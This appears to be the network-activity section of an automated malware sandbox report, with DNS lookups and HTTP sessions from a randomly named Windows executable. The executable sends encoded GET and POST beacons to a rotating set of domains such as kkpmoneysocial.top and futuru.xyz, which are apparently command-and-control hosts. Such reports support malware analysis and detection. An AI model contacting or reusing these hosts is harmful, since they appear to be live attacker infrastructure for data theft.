                                                                                      Nov 25, 2024 13:57:06.669470072 CET1.1.1.1192.168.2.80xa69bNo error (0)www.sankan-fukushi.info163.44.185.183A (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:57:06.669481993 CET1.1.1.1192.168.2.80xa69bNo error (0)www.sankan-fukushi.info163.44.185.183A (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:57:22.162269115 CET1.1.1.1192.168.2.80x2fe6No error (0)www.zxyck.net118.107.250.103A (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:57:37.905720949 CET1.1.1.1192.168.2.80x4ce8No error (0)www.krshop.shop13.248.169.48A (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:57:37.905720949 CET1.1.1.1192.168.2.80x4ce8No error (0)www.krshop.shop76.223.54.146A (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:57:52.943248034 CET1.1.1.1192.168.2.80x5c0bNo error (0)www.samundri.onlinesamundri.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                      Nov 25, 2024 13:57:52.943248034 CET1.1.1.1192.168.2.80x5c0bNo error (0)samundri.online84.32.84.32A (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:58:07.727294922 CET1.1.1.1192.168.2.80xac1cNo error (0)www.supernutra01.online104.21.24.198A (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:58:07.727294922 CET1.1.1.1192.168.2.80xac1cNo error (0)www.supernutra01.online172.67.220.36A (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:58:22.935209990 CET1.1.1.1192.168.2.80x4bf2No error (0)www.callyur.shopcallyur.shopCNAME (Canonical name)IN (0x0001)false
                                                                                      Nov 25, 2024 13:58:22.935209990 CET1.1.1.1192.168.2.80x4bf2No error (0)callyur.shop66.29.137.10A (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:58:37.968969107 CET1.1.1.1192.168.2.80x139fNo error (0)www.iner-tech.online37.140.192.206A (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:58:54.153487921 CET1.1.1.1192.168.2.80xefadNo error (0)www.oztalkshw.store199.59.243.227A (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:59:10.661498070 CET1.1.1.1192.168.2.80x8498No error (0)www.fantastica.digital194.58.112.174A (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • www.bioland.app
                                                                                      • www.kkpmoneysocial.top
                                                                                      • www.futuru.xyz
                                                                                      • www.yhj12.one
                                                                                      • www.officinadelpasso.shop
                                                                                      • www.sankan-fukushi.info
                                                                                      • www.zxyck.net
                                                                                      • www.krshop.shop
                                                                                      • www.samundri.online
                                                                                      • www.supernutra01.online
                                                                                      • www.callyur.shop
                                                                                      • www.iner-tech.online
                                                                                      • www.oztalkshw.store

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.849714202.61.233.66806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:55:47.803599119 CET509OUTGET /0322/?YvA4=xnL8AvI8CJiPEDU&UbRxm=HxR1FeZHXJ7BSqCS3fD8mQxxaJumBZenc9dO7nNnWiW1TdG8ymlkgtRZzCsH8EsCxrgxn7fyxa4U+0BCWK8lvrgV1wD4C6X04kpiBTwqtuBdGQan/Ge0WLc1tZ3QEOC6mw== HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.bioland.app
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:55:49.066917896 CET1069INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Mon, 25 Nov 2024 12:55:48 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 808
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Last-Modified: Thu, 20 Jun 2024 14:25:06 GMT
                                                                                      ETag: "328-61b5314d78b6f"
                                                                                      Accept-Ranges: bytes
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>404 Not Found</title> <link rel="stylesheet" href="/error_docs/styles.css"></head><body><div class="page"> <div class="main"> <h1>Server Error</h1> <div class="error-code">404</div> <h2>Page Not Found</h2> <p class="lead">This page either doesn't exist, or it moved somewhere else.</p> <hr/> <p>That's what you can do</p> <div class="help-actions"> <a href="javascript:location.reload();">Reload Page</a> <a href="javascript:history.back();">Back to Previous Page</a> <a href="/">Home Page</a> </div> </div></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.849716172.67.129.38806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:56:04.779733896 CET776OUTPOST /dlkm/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.kkpmoneysocial.top
                                                                                      Origin: http://www.kkpmoneysocial.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 206
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.kkpmoneysocial.top/dlkm/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 73 36 4e 51 46 30 31 32 43 6f 63 4b 55 75 54 64 6c 4d 42 38 33 4b 2f 71 63 4f 4c 34 67 55 42 5a 33 71 2f 6b 62 38 30 58 51 73 6f 39 38 62 39 38 4c 77 46 71 64 62 55 79 32 44 4c 52 6a 68 45 6a 65 7a 61 79 76 31 63 48 31 71 6f 66 71 35 4b 30 46 58 75 44 70 53 30 49 78 61 67 4d 38 66 53 65 6b 45 67 54 68 52 67 77 46 79 49 36 36 50 42 59 69 58 70 63 44 2b 6c 5a 39 41 64 37 2b 53 31 7a 6e 71 4d 48 6e 62 73 56 6f 56 50 6f 72 62 69 61 2b 63 67 64 36 43 61 46 67 61 47 62 78 65 63 48 72 51 57 6b 4d 66 68 53 54 4c 65 56 4d 55 4a 43 6f 69 7a 64 38 4c 78 58 41 2b 62 65 47 6d 68 75 4a 37 4b 58 45 30 6b 3d
                                                                                      Data Ascii: UbRxm=s6NQF012CocKUuTdlMB83K/qcOL4gUBZ3q/kb80XQso98b98LwFqdbUy2DLRjhEjezayv1cH1qofq5K0FXuDpS0IxagM8fSekEgThRgwFyI66PBYiXpcD+lZ9Ad7+S1znqMHnbsVoVPorbia+cgd6CaFgaGbxecHrQWkMfhSTLeVMUJCoizd8LxXA+beGmhuJ7KXE0k=
                                                                                      Nov 25, 2024 13:56:06.092663050 CET955INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:56:05 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=na0%2BdNc7Sz9PRExX9CV11b2lVgfDZypMcHE39JDjHs00WMsCXPXh3gy2FBK1ExDxREUVp9D0H%2BK9jhVKqKMMZ28%2BIA%2BB2i6mhWU1NeCUlgu92dO7g7%2Bw6BQeaZhQR9wI0Snv275hc8KK"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e81cbfbdd9432dc-EWR
                                                                                      Content-Encoding: gzip
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1830&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=776&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.849717172.67.129.38806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:56:07.445298910 CET796OUTPOST /dlkm/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.kkpmoneysocial.top
                                                                                      Origin: http://www.kkpmoneysocial.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 226
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.kkpmoneysocial.top/dlkm/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 73 36 4e 51 46 30 31 32 43 6f 63 4b 56 4b 76 64 6e 73 39 38 31 71 2f 31 54 75 4c 34 75 30 42 6a 33 72 44 6b 62 39 77 48 52 66 4d 39 38 37 74 38 5a 45 78 71 52 37 55 79 39 6a 4c 55 39 52 45 30 65 7a 58 46 76 30 77 48 31 73 45 66 71 38 4f 30 46 6b 47 41 7a 69 30 4f 39 36 67 4f 68 50 53 65 6b 45 67 54 68 56 77 4b 46 79 77 36 36 39 56 59 69 32 70 64 66 75 6c 57 74 51 64 37 30 79 31 33 6e 71 4e 39 6e 65 45 7a 6f 58 6e 6f 72 65 47 61 2b 4e 67 43 7a 43 61 48 76 36 48 4e 38 73 52 2b 72 51 69 56 58 38 4e 54 56 4b 43 74 41 43 34 6f 79 41 37 62 2f 4c 5a 38 41 39 7a 6f 44 52 38 47 54 59 61 6e 61 6a 79 6f 49 70 77 7a 41 67 63 52 53 61 31 6d 48 64 38 56 38 65 2b 31
                                                                                      Data Ascii: UbRxm=s6NQF012CocKVKvdns981q/1TuL4u0Bj3rDkb9wHRfM987t8ZExqR7Uy9jLU9RE0ezXFv0wH1sEfq8O0FkGAzi0O96gOhPSekEgThVwKFyw669VYi2pdfulWtQd70y13nqN9neEzoXnoreGa+NgCzCaHv6HN8sR+rQiVX8NTVKCtAC4oyA7b/LZ8A9zoDR8GTYanajyoIpwzAgcRSa1mHd8V8e+1
                                                                                      Nov 25, 2024 13:56:08.804627895 CET957INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:56:08 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dqwxji09v79CJXsGDAyIFzRR7%2F6N31VQVfUsOHOtuiNT%2ByDw91RA0GRKOidrsFYT4Nq1DxZUrPZkHAe%2FpCS%2BpJKSD553%2B40k32s8ww49DkLH8nfqAYHgIr%2BfEMwSpsQtV63X78eCplpf"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e81cc0ccbe8c43b-EWR
                                                                                      Content-Encoding: gzip
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1488&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=796&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.849718172.67.129.38806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:56:10.120735884 CET1813OUTPOST /dlkm/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.kkpmoneysocial.top
                                                                                      Origin: http://www.kkpmoneysocial.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1242
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.kkpmoneysocial.top/dlkm/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 73 36 4e 51 46 30 31 32 43 6f 63 4b 56 4b 76 64 6e 73 39 38 31 71 2f 31 54 75 4c 34 75 30 42 6a 33 72 44 6b 62 39 77 48 52 66 45 39 38 4a 56 38 49 56 78 71 66 62 55 79 68 54 4c 76 39 52 46 32 65 7a 66 42 76 30 4d 35 31 76 77 66 72 61 79 30 55 42 79 41 6d 79 30 4f 67 4b 67 50 38 66 54 47 6b 45 51 58 68 52 73 4b 46 79 77 36 36 38 6c 59 72 48 70 64 4d 65 6c 5a 39 41 64 2f 2b 53 31 50 6e 71 56 48 6e 65 41 46 6f 6e 48 6f 6f 2b 32 61 7a 66 49 43 79 69 61 42 75 36 48 46 38 73 64 66 72 52 4f 52 58 39 34 32 56 4c 32 74 44 6a 51 7a 33 56 61 42 70 39 4d 4e 45 2f 61 4c 44 7a 77 6e 4e 2f 32 63 58 52 37 4a 43 4f 38 62 58 44 73 44 47 71 49 36 61 34 6f 37 36 4f 53 31 51 6d 46 2b 50 79 71 2b 6b 79 62 5a 46 46 53 45 7a 77 6c 48 49 39 71 67 36 4b 55 2f 67 2b 35 77 37 56 46 6e 4a 73 4f 34 6d 6e 63 4e 74 6a 2f 6c 61 4d 39 76 48 71 30 4a 6b 35 55 4d 31 4d 6e 4c 51 7a 57 30 78 56 2f 64 65 62 6d 67 42 67 62 58 58 4a 31 50 38 62 49 76 63 79 37 51 48 46 39 2b 32 73 30 47 51 48 61 6e 37 53 4f 48 6e 72 32 54 [TRUNCATED]
                                                                                      Data Ascii: UbRxm=s6NQF012CocKVKvdns981q/1TuL4u0Bj3rDkb9wHRfE98JV8IVxqfbUyhTLv9RF2ezfBv0M51vwfray0UByAmy0OgKgP8fTGkEQXhRsKFyw668lYrHpdMelZ9Ad/+S1PnqVHneAFonHoo+2azfICyiaBu6HF8sdfrRORX942VL2tDjQz3VaBp9MNE/aLDzwnN/2cXR7JCO8bXDsDGqI6a4o76OS1QmF+Pyq+kybZFFSEzwlHI9qg6KU/g+5w7VFnJsO4mncNtj/laM9vHq0Jk5UM1MnLQzW0xV/debmgBgbXXJ1P8bIvcy7QHF9+2s0GQHan7SOHnr2T3HMRVBWC67ZOFSX6zEzgQKZbVkePO67DSh0OHRjDHMGPDfeg0kwxeHv34ZpwrbG3RjGE+c1AvExC/B4qli7tNBsdolxXMRThzGi7O6Q6Z88d65I6JCDA7c6wHgkOMc/0OJcciWqFJcylB0dBMvD52Cg8vpOdbKNfIvGiOrqJoPqlHKtgl6xhW8yUwUpp/MdzaGcNzB/JkMYQwL6aCLm2oTdtsp2yWsTJ423NpqmU8Iv3ILDGfLQ+L1Wl39WRKxVc+AGYNbmN/PEIufpK9U2mooSbCyX6TzxdfcCzSqMd+zD5WIC8OETk/bGus8Rlwr3vHadB8kGRrPf53T1uDDW9XR2vz4drMh1x0t8hUv3ovV+H8/CFjzKYcP7picK0qWkHb93Z3F7VHne8Yo/TQhdiKlby53pcmyg3apneFxgNdhTXxLASMNbEn/YD+3T1IsrcnKPXa/xf7dKZz7qFEPDQN9D7LzquOslncb8lyxoufcqsxtNlKkfG34VzRqdbbj1n7+y0rwUCPNsng9sUYYN8r/Bk/Fc+jyDe9+SpdQupBhoZCmel0QFqEJNLLhMLqklwjXWSDTp1CmiY0xNoRW7w4EZOsvzp4fKs8Srejsha7dHTMnekA2zk6zWf9O5ISByDoFlHyfOv4Ly8UUlM5gYJVnik+FFur5XbDa [TRUNCATED]
                                                                                      Nov 25, 2024 13:56:11.425204992 CET945INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:56:11 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=onSbGqX3FivBa7fkhoyvrasE1koFyJmnMd7wldbYiBArGcAn7BTbCECDDaJhoF195ishCwaVpSksMH5yMmJ1G2IbD2eAfwPX6ajGx2r%2BPs3hCx1Eg0JgZaWrUXNvieLZ%2F4aDgJJBlpjW"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e81cc1d2f2143e3-EWR
                                                                                      Content-Encoding: gzip
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1709&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1813&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a
                                                                                      Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                                                                                      Nov 25, 2024 13:56:11.425954103 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.849719172.67.129.38806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:56:12.810961962 CET516OUTGET /dlkm/?UbRxm=h4lwGEVwdKAie/3i69ZS5ajdX7DevTN5l7rCLvUsWI5Ax6oJIVJyRtoh5SGHiRwIVgG3mVQ8/tYP0qqkAkm1lhwb/KkDwsT64i8O6GgUd051zcV49WQ+HPRS7BJ45XoE1w==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.kkpmoneysocial.top
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:56:14.280613899 CET1236INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:56:13 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JGIQVYX6BGrB5WQUwYt2ob%2BmWuMLsKO5XNlcQm%2FhMq4tlAzAMMPB9J1vQZXDTgoFuw8i%2FuFlrGCyWHJiHPTNY6JCBJeYOu3vD%2FH9TYuHvq%2BTzoRnPqlt1P1WmDs3eUh5Tt5zMMJ2uKb6"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e81cc2e0edc0f4b-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1694&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=516&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                      Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page --
                                                                                      Nov 25, 2024 13:56:14.280642986 CET77INData Raw: 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: >... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.849721209.74.77.109806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:56:19.923913956 CET752OUTPOST /8uep/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.futuru.xyz
                                                                                      Origin: http://www.futuru.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 206
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.futuru.xyz/8uep/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
